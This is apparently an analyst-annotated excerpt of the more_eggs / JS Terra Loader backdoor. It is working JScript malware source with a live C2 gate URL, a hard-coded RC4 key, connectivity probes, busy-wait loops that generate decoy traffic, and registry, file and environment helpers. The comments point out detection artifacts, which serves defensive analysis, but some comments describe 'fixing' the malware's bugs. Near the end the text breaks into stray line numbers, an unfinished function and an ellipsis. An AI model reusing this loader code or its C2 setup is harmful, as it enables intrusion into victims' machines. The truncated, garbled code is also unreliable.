// sample from SHA256: 73defd8066549e5b09c509064bc5bd29e77eca2c18d114c0bcf3dfa1cefe6939
// signed malware install loader -> JS Terra Loader, aka the more_eggs backdoor
// --- Loader configuration -------------------------------------------------
// Build/version tag of the loader.
var BV = "6.0";
// Remote endpoint. The name suggests the C2 / check-in URL; its use is not on
// this page. The host and path are indicators worth recording as-is.
var Gate = "https://tonsandmillions.com/sendanalytics-28529/info";
// Hard-coded key. Presumably the key handed to zzzz4/zzz4Bytes (RC4) further
// down -- confirm at the call sites. A static key means any captured
// ciphertext can be recovered offline once the key is known.
var Rkey = "ZkY3egXBulkogSbGEHqA";

// --- Retry / reconnect tuning ---------------------------------------------
var hit_each = 1;
var error_retry = 2;
var restart_h = 4;
// With the values above this is 1 * 240 / 1 = 240; the expression is kept so
// the three knobs stay meaningful if they are changed.
var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each);
var rcon_now = 0;

// --- Runtime flags and collected host facts -------------------------------
var gtfo = false;
var selfdel = false;
var table = [];
var Build = "";
var PCN = "";
var UNM = "";
var SYSTEM = 0;
// Registry hive prefix used for per-user persistence/reads (see rexist).
var rootK = "HKCU";

// --- Paths resolved at runtime --------------------------------------------
var workingDir = "";
var main_mitm = "";
var xApp = "";
var xTmp = "";
var PreserveH = "";
var xStore = "";

// Character alphabet; its consumer is not on this page.
var set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"';
// COM factory. Every host interaction in this file (XMLHTTP/ServerXMLHTTP,
// WScript.Shell, Scripting.FileSystemObject) is created through here, so the
// ProgIDs passed to obj() are the loader's complete COM footprint -- a useful
// list when writing detections for the script host.
function obj(xString) {
  var progId = xString;
  return new ActiveXObject(progId);
}
// Two HTTP clients, created newest-ProgID-first.
//   con - Msxml2.XMLHTTP (the "browser" client); used by check_Net(0).
//   xhr - Msxml2.ServerXMLHTTP; supports setTimeouts() and is what fuck_js
//         and check_Net(1) use.
// A failure on any candidate but the last falls through to the next one; the
// last candidate's error is not caught and aborts the script.
var con;
var xhr;
(function () {
  function firstAvailable(progIds) {
    var last = progIds.length - 1;
    var k;
    for (k = 0; k < last; k += 1) {
      try {
        return obj(progIds[k]);
      } catch (unavailable) {
        // this MSXML build is not registered; try the older ProgID
      }
    }
    return obj(progIds[last]);
  }
  con = firstAvailable(["Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0", "Microsoft.XMLHTTP"]);
  xhr = firstAvailable(["Msxml2.ServerXMLHTTP.6.0", "Msxml2.ServerXMLHTTP.3.0"]);
}());
// Connectivity probe: synchronous GET of http://www.w3.org/1999/XSL/Format
// and an exact compare of the body against 'This is another XSL namespace\n'.
//   method 0 - use con (XMLHTTP); on any open/send failure retry once as method 1.
//   method 1 - use xhr (ServerXMLHTTP); on failure return false.
// Returns true only when the request completed with status 200 and the body
// matched. The plain-HTTP request to w3.org with that fixed path is a stable
// network artifact of this loader.
function check_Net(method) {
  var client = (method === 1) ? xhr : con;
  var online = false;

  // First attempt with the plain client gets one retry over ServerXMLHTTP;
  // anything else is a hard failure.
  function retryOrFail() {
    if (method === 0) {
      return check_Net(1);
    }
    return false;
  }

  try {
    client.open("GET", "http://www.w3.org/1999/XSL/Format", false);
  } catch (openErr) {
    return retryOrFail();
  }

  // The request is synchronous, so this fires during send() below.
  client.onreadystatechange = function () {
    if (client.readyState !== 4) {
      return;
    }
    var body = (client.status === 200) ? client.responseText : "";
    online = Boolean(body) && body === 'This is another XSL namespace\n';
  };

  try {
    client.send();
  } catch (sendErr) {
    return retryOrFail();
  }
  return online;
}
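// Inclusive length-range check.
//   mstr     - string whose .length is tested
//   min, max - inclusive bounds
// Returns true when min <= mstr.length <= max, false otherwise. The empty
// string is rejected even if min <= 0. (The original fell off the end and
// returned undefined for out-of-range input; it now always returns a boolean.)
function cLength(mstr, min, max) {
  var n = mstr.length;
  if (n === 0) {
    return false;
  }
  return n >= min && n <= max;
}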
// Uniform-ish integer in [ceil(min), floor(max)] from Math.random() -- not a
// cryptographic source, which is fine here: its only visible use is sizing the
// random URL path in fuck_js.
function rInt(min, max) {
  var lo = Math.ceil(min);
  var hi = Math.floor(max);
  var span = hi - lo + 1;
  return lo + Math.floor(Math.random() * span);
}
// Random alphanumeric string of `len` characters (A-Z, a-z, 0-9).
// Uses a do/while, so len <= 0 still yields one character. Not cryptographic
// (Math.random); only used to build throwaway URL paths in fuck_js.
function rStr(len) {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  var out = "";
  var count = 0;
  do {
    out += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
    count += 1;
  } while (count < len);
  return out;
}
// One throwaway request: GET http://8.8.8.8/<8..32 random alphanumerics> over
// ServerXMLHTTP with resolve/connect timeouts of 5 s and send/receive timeouts
// of 10 s. Returns false if anything throws, otherwise undefined; the response
// is never read. It is the body of the busy-wait loops in waitfor/waitfor2, so
// the loader's "idle" time shows up as repeated plain-HTTP traffic to a public
// DNS resolver's address -- an easy network signature.
function fuck_js() {
  var path = rStr(rInt(8, 32));
  try {
    xhr.setTimeouts(5000, 5000, 10000, 10000);
    xhr.open("GET", "http://8.8.8.8/" + path, false);
    xhr.send();
  } catch (netErr) {
    return false;
  }
}
138
139
// Busy-wait for zMinute minutes, then call main() (defined elsewhere in the
// file, not on this page). This is not a sleep: each iteration runs fuck_js(),
// so the wait burns CPU and emits a request to 8.8.8.8 per loop. Date.parse(Date())
// has whole-second resolution, which is kept as in the original.
function waitfor(zMinute) {
  function nowMs() {
    return Date.parse(Date());
  }
  var deadline = nowMs() + zMinute * 60000;
  for (;;) {
    if (nowMs() >= deadline) {
      break;
    }
    fuck_js();
  }
  main();
}
// Same busy-wait as waitfor (fuck_js() on every iteration), but the follow-up
// is optional: go() -- defined elsewhere, not on this page -- runs only when
// iGo === 1; otherwise the function simply returns after the delay.
function waitfor2(zMinute, iGo) {
  function nowMs() {
    return Date.parse(Date());
  }
  var deadline = nowMs() + zMinute * 60000;
  for (;;) {
    if (nowMs() >= deadline) {
      break;
    }
    fuck_js();
  }
  if (iGo === 1) {
    go();
  }
}
// True when Scripting.FileSystemObject reports that xpath exists as a file.
// Any failure (COM object unavailable, bad path) is reported as false rather
// than propagated.
function fexist(xpath) {
  try {
    var fso = obj("Scripting.FileSystemObject");
    return fso.FileExists(xpath) ? true : false;
  } catch (fsErr) {
    return false;
  }
}
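// True when WScript.Shell.RegRead(xpath) returns a non-null value.
// RegRead typically throws for a missing key/value, so the catch is the usual
// "absent" path; a null read and any COM failure also yield false. (The
// original returned undefined for a null read; it now always returns a boolean.)
function rexist(xpath) {
  var shell;
  var value;
  try {
    shell = obj("Wscript.shell");
    value = shell.RegRead(xpath);
  } catch (readErr) {
    return false;
  }
  return value !== null;
}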
// Read one environment variable through WScript.Shell.Environment.
//   xSystem === 1 - the "SYSTEM" (machine-wide) block
//   otherwise     - the "PROCESS" block of the script host
// Errors from the COM object are not caught here.
function myEnv(xVar, xSystem) {
  var shell = obj("WScript.Shell");
  var block = (xSystem === 1) ? "SYSTEM" : "PROCESS";
  return shell.environment(block)(xVar);
}
// "64" when the SYSTEM PROCESSOR_ARCHITECTURE is AMD64, "86" for anything else
// (so ARM64 and unknown values are also reported as "86").
function myBits() {
  var arch = myEnv("PROCESSOR_ARCHITECTURE", 1);
  return (arch === "AMD64") ? "64" : "86";
}
// RC4 over a JS string: standard KSA/PRGA, each UTF-16 code unit of `str`
// XORed with one keystream byte and re-packed with String.fromCharCode.
// Symmetric (same call decrypts). Returns "" when key or str is empty.
// Only code units < 256 round-trip as bytes; anything larger is XORed in the
// low byte only. RC4 with a static key gives no real confidentiality, which for
// an analyst means captured data can be decoded offline once the key is known
// (Rkey at the top is the obvious candidate -- confirm at the call sites).
function zzzz4(key, str) {
  var out = "";
  if (!key || !str) {
    return out;
  }

  var box = [];
  var a;
  var b = 0;
  var tmp;

  // Key scheduling: identity permutation, then 256 key-driven swaps.
  for (a = 0; a < 256; a += 1) {
    box[a] = a;
  }
  for (a = 0; a < 256; a += 1) {
    b = (b + box[a] + key.charCodeAt(a % key.length)) % 256;
    tmp = box[a];
    box[a] = box[b];
    box[b] = tmp;
  }

  // Keystream generation, one byte per input code unit.
  a = 0;
  b = 0;
  var pos;
  for (pos = 0; pos < str.length; pos += 1) {
    a = (a + 1) % 256;
    b = (b + box[a]) % 256;
    tmp = box[a];
    box[a] = box[b];
    box[b] = tmp;
    out += String.fromCharCode(str.charCodeAt(pos) ^ box[(box[a] + box[b]) % 256]);
  }
  return out;
}
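// RC4 over a numeric array (bytes in, bytes out). Same cipher as zzzz4 but
// note the reversed parameter order: (xArray, key). Symmetric. Returns [] when
// key is empty, xArray is falsy, or xArray is empty. (The original's do/while
// emitted one keystream byte for an empty array; that is fixed here.)
// As with zzzz4, the cipher only obscures data from casual inspection; anyone
// holding the static key can recover the plaintext.
function zzz4Bytes(xArray, key) {
  var out = [];
  if (!key || !xArray || xArray.length === 0) {
    return out;
  }

  var box = [];
  var a;
  var b = 0;
  var tmp;

  // Key scheduling.
  for (a = 0; a < 256; a += 1) {
    box[a] = a;
  }
  for (a = 0; a < 256; a += 1) {
    b = (b + box[a] + key.charCodeAt(a % key.length)) % 256;
    tmp = box[a];
    box[a] = box[b];
    box[b] = tmp;
  }

  // Keystream generation, one byte per input element.
  a = 0;
  b = 0;
  var pos;
  for (pos = 0; pos < xArray.length; pos += 1) {
    a = (a + 1) % 256;
    b = (b + box[a]) % 256;
    tmp = box[a];
    box[a] = box[b];
    box[b] = tmp;
    out.push(xArray[pos] ^ box[(box[a] + box[b]) % 256]);
  }
  return out;
}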
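// String -> array of CP437 byte values. ASCII (code < 128) passes through;
// the code points of the CP437 high half map back to 0x80..0xFF; any other
// code point yields undefined in the output (unchanged from the original).
// Returns [] for the empty string (the original's do/while produced
// [undefined]). Presumably paired with zzz4Bytes so strings can be ciphered as
// bytes -- confirm at the call sites; tS below looks like the inverse.
function tB(htc) {
  // CP437 0x80..0xFF in byte order: entry k is the Unicode code point of byte 0x80 + k.
  var highHalf = [
    0xC7, 0xFC, 0xE9, 0xE2, 0xE4, 0xE0, 0xE5, 0xE7, 0xEA, 0xEB, 0xE8, 0xEF, 0xEE, 0xEC, 0xC4, 0xC5,
    0xC9, 0xE6, 0xC6, 0xF4, 0xF6, 0xF2, 0xFB, 0xF9, 0xFF, 0xD6, 0xDC, 0xA2, 0xA3, 0xA5, 0x20A7, 0x192,
    0xE1, 0xED, 0xF3, 0xFA, 0xF1, 0xD1, 0xAA, 0xBA, 0xBF, 0x2310, 0xAC, 0xBD, 0xBC, 0xA1, 0xAB, 0xBB,
    0x2591, 0x2592, 0x2593, 0x2502, 0x2524, 0x2561, 0x2562, 0x2556, 0x2555, 0x2563, 0x2551, 0x2557, 0x255D, 0x255C, 0x255B, 0x2510,
    0x2514, 0x2534, 0x252C, 0x251C, 0x2500, 0x253C, 0x255E, 0x255F, 0x255A, 0x2554, 0x2569, 0x2566, 0x2560, 0x2550, 0x256C, 0x2567,
    0x2568, 0x2564, 0x2565, 0x2559, 0x2558, 0x2552, 0x2553, 0x256B, 0x256A, 0x2518, 0x250C, 0x2588, 0x2584, 0x258C, 0x2590, 0x2580,
    0x3B1, 0xDF, 0x393, 0x3C0, 0x3A3, 0x3C3, 0xB5, 0x3C4, 0x3A6, 0x398, 0x3A9, 0x3B4, 0x221E, 0x3C6, 0x3B5, 0x2229,
    0x2261, 0xB1, 0x2265, 0x2264, 0x2320, 0x2321, 0xF7, 0x2248, 0xB0, 0x2219, 0xB7, 0x221A, 0x207F, 0xB2, 0x25A0, 0xA0
  ];

  // Invert into a sparse array keyed by code point, like the original's `y`.
  var toByte = [];
  var k;
  for (k = 0; k < highHalf.length; k += 1) {
    toByte[highHalf[k]] = 0x80 + k;
  }

  var bytes = [];
  var pos;
  var code;
  for (pos = 0; pos < htc.length; pos += 1) {
    code = htc.charCodeAt(pos);
    bytes.push(code < 128 ? code : toByte[code]);
  }
  return bytes;
}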
function tS(arenderer) {
431
var x = [];
432
x[0x80] = 0x00C7;
433
x[0x81] = 0x00FC;
434
x[0x82] = 0x00E9;
435
x[0x83] = 0x00E2;
436
x[0x84] = 0x00E4;
437
x[0x85] = 0x00E0;
438
x[0x86] = 0x00E5;
439
x[0x87] = 0x00E7;
440
x[0x88] = 0x00EA;
441
x[0x89] = 0x00EB;
442
x[0x8A] = 0x00E8;
443
x[0x8B] = 0x00EF;
444
x[0x8C] = 0x00EE;
445
x[0x8D] = 0x00EC;
446
x[0x8E] = 0x00C4;
447
x[0x8F] = 0x00C5;
448
x[0x90] = 0x00C9;
449
x[0x91] = 0x00E6;
450
x[0x92] = 0x00C6;
451
x[0x93] = 0x00F4;
452
x[0x94] = 0x00F6;
453
x[0x95] = 0x00F2;
454
x[0x96] = 0x00FB;
455
x[0x97] = 0x00F9;
456
x[0x98] = 0x00FF;
457
x[0x99] = 0x00D6;
458
x[0x9A] = 0x00DC;
459
x[0x9B] = 0x00A2;
460
x[0x9C] = 0x00A3;
461
x[0x9D] = 0x00A5;
462
x[0x9E] = 0x20A7;
463
x[0x9F] = 0x0192;
464
x[0xA0] = 0x00E1;
465
x[0xA1] = 0x00ED;
466
x[0xA2] = 0x00F3;
467
x[0xA3] = 0x00FA;
468
x[0xA4] = 0x00F1;
469
x[0xA5] = 0x00D1;
470
x[0xA6] = 0x00AA;
471
x[0xA7] = 0x00BA;
472
x[0xA8] = 0x00BF;
473
x[0xA9] = 0x2310;
474
x[0xAA] = 0x00AC;
475
x[0xAB] = 0x00BD;
476
x[0xAC] = 0x00BC;
477
x[0xAD] = 0x00A1;
478
x[0xAE] = 0x00AB;
479
x[0xAF] = 0x00BB;
480
x[0xB0] = 0x2591;
481
x[0xB1] = 0x2592;
482
x[0xB2] = 0x2593;
483
x[0xB3] = 0x2502;
484
x[0xB4] = 0x2524;
485
x[0xB5] = 0x2561;
486
x[0xB6] = 0x2562;
487
x[0xB7] = 0x2556;
488
x[0xB8] = 0x2555;
489
x[0xB9] = 0x2563;
490
x[0xBA] = 0x2551;
491
x[0xBB] = 0x2557;
492
x[0xBC] = 0x255D;
493
x[0xBD] = 0x255C;
494
x[0xBE] = 0x255B;
495
x[0xBF] = 0x2510;
496
x[0xC0] = 0x2514;
497
x[0xC1] = 0x2534;
498
x[0xC2] = 0x252C;
499
x[0xC3] = 0x251C;
500
x[0xC4] = 0x2500;
501
x[0xC5] = 0x253C;
502
x[0xC6] = 0x255E;
503
x[0xC7] = 0x255F;
504
x[0xC8] = 0x255A;
505
x[0xC9] = 0x2554;
506
x[0xCA] = 0x2569;
507
x[0xCB] = 0x2566;
508
x[0xCC] = 0x2560;
509
x[0xCD] = 0x2550;
510
x[0xCE] = 0x256C;
511
x[0xCF] = 0x2567;
512
x[0xD0] = 0x2568;
513
x[0xD1] = 0x2564;
514
x[0xD2] = 0x2565;
515
x[0xD3] = 0x2559;
516
...
517
//